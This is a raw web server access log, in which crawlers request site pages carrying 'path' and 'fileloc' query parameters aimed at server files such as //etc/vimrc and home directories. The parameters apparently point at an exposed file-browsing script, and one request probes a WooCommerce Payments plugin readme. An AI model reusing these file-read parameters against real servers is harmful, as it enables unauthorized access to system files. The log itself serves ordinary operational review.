144.76.32.72 - - [19/Oct/2025:08:31:34 -0400] "GET /y8-jpg/?path=/home/wwwrenee HTTP/1.1" 200 4133 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:31:38 -0400] "GET /2018/10/?path=/home/wwwrenee HTTP/1.1" 200 4133 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
185.65.202.110 - - [19/Oct/2025:08:31:38 -0400] "GET /wp-content/plugins/woocommerce-payments/readme.txt HTTP/1.1" 200 27635 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
144.76.32.72 - - [19/Oct/2025:08:31:48 -0400] "GET /become-a-teacher/?path=/home HTTP/1.1" 200 2752 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
34.227.234.246 - - [19/Oct/2025:08:31:51 -0400] "GET /%E0%B8%81%E0%B8%8E%E0%B8%AB%E0%B8%A1%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%81%E0%B8%A2%E0%B8%81%E0%B8%95%E0%B8%B1%E0%B8%A7%E0%B8%82%E0%B8%AD%E0%B8%87-1xbet-%E0%B8%A0%E0%B8%B2%E0%B8%A2/?fileloc=//opt/alt/tests/alt-php82-pecl-igbinary_3.2.15-1.el8/tests/igbinary_025.phpt&path=//opt/alt/tests/alt-php82-pecl-igbinary_3.2.15-1.el8/tests HTTP/1.1" 200 3168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
144.76.32.72 - - [19/Oct/2025:08:31:51 -0400] "GET /col-png/?path=/home/wwwrenee HTTP/1.1" 200 4133 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
144.76.32.72 - - [19/Oct/2025:08:31:55 -0400] "GET /contact/?path=/home/wwwrenee HTTP/1.1" 200 4133 "-" "Mozilla/5.0 (compatible; BLEXBot/1.0; +https://help.seranking.com/en/blex-crawler)"
216.73.216.109 - - [19/Oct/2025:08:32:01 -0400] "GET /team-19-jpg/?fileloc=%2F%2Fetc%2Fvimrc&path=%2F%2Fetc HTTP/1.1" 403 55015 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
